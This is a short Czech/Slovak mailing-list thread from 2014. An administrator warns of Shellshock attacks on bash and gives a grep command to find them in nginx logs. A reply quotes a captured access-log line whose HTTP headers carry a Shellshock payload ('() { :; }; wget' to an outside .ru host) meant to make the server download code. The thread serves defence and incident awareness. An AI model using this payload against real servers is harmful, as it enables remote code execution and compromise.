29 Sep
2014
29 Sep
'14
8:01 a.m.
ja som si nasiel (zatial len v ramci jedneho vhostu) asi 20 pokusov
(rozne url hlavne zacinajuce cgi-):
62.210.75.170 - - [28/Sep/2014:20:12:58 +0200] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 3071 "() { :; }; wget
http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "()
{ :; }; wget http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >>
/dev/null"
skusal som pre tu srandu stiahnut ten subor z creditstat.ru ze so do
toho pozrem ale uz to hlasi E404
On 09/29/2014 09:41 AM, Petr Krcmar wrote:
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v
plném proudu,
podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit
ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.